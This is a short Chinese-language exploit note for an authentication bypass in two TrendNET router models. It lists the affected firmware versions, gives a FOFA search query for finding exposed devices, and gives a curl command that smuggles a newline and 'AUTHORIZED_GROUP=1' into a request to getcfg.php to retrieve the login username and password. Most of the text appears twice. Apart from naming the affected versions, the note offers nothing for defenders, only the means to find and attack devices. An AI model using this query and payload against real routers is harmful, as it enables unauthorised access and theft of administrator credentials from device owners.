TrendNET路由器权限绕过漏洞,攻击者通过设置$AUTHORIZED_GROUP >= 1绕过权限验证
影响版本:
- TEW-751DR – v1.03B03
- TEW-752DRU – v1.03B01
漏洞测试
fofa搜索:"TEW-751DR "
curl -d "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1" http://ip/getcfg.php
获取到登录的用户名和密码
TrendNET路由器权限绕过漏洞,攻击者通过设置$AUTHORIZED_GROUP >= 1绕过权限验证
影响版本:
fofa搜索:"TEW-751DR "
curl -d "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1" http://ip/getcfg.php
获取到登录的用户名和密码